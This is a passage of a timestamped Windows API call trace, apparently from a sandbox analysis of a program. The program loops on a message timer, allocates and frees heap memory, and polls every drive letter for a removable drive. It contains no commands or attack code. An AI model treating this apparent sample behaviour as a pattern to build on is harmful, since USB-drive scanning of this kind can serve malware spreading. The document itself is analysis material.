hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0220.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0220.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0220.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.348] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.348] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.349] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.349] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.349] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.349] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.349] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.350] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.350] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.350] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.350] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.351] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.351] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.351] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.351] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.352] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.352] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.352] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.352] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.352] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.353] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.353] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.353] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.354] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.354] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.354] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.354] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0220.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0220.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.355] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.355] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.355] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0220.355] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.355] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.355] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.356] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0220.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0220.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325de0 [0220.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.356] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0220.356] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.356] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325de0 | out: hHeap=0x12c0000) returned 1 [0220.356] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.356] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0220.356] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0220.356] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.356] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0220.356] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0220.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0220.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.357] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.357] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0220.357] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0220.357] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.357] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0220.357] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0220.358] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0220.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0220.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.358] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0220.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0220.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.358] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0220.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0220.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0220.358] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.358] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.358] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.359] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.359] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.359] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.359] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.360] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.360] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.360] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.360] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.361] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.361] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.361] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.361] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.362] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.362] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.362] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.362] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.362] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.362] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.363] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.363] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.363] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.363] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.363] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.364] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.364] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0220.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.364] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.364] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.364] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0220.364] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.364] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.364] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0220.364] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0220.364] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0220.364] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.365] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.365] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.365] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0220.365] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.365] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0220.365] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325de0 [0220.365] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0220.365] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0220.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325de0 | out: hHeap=0x12c0000) returned 1 [0220.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0220.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0220.365] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0220.365] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0220.365] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.365] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.366] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.366] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0220.366] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0220.366] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0220.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.366] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.366] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.366] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0220.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0220.366] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0220.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0220.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.366] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0220.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0220.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0220.366] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0220.366] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.366] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.366] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.367] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.367] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.619] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.619] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.619] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.619] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.619] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.620] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.620] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.620] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.620] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.621] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.621] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.621] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.621] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.622] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.622] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.622] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.622] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.622] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.623] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.623] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.623] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.625] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.626] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.626] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0220.626] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.626] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.626] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.626] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0220.626] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.626] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.626] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0220.626] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.626] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0220.626] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.626] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0220.626] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0220.627] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0220.627] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.627] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.627] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0220.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0220.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325dc0 [0220.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325dc0 | out: hHeap=0x12c0000) returned 1 [0220.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0220.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0220.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0220.628] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0220.629] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0220.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0220.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0220.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.630] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0220.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0220.630] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0220.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.630] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: 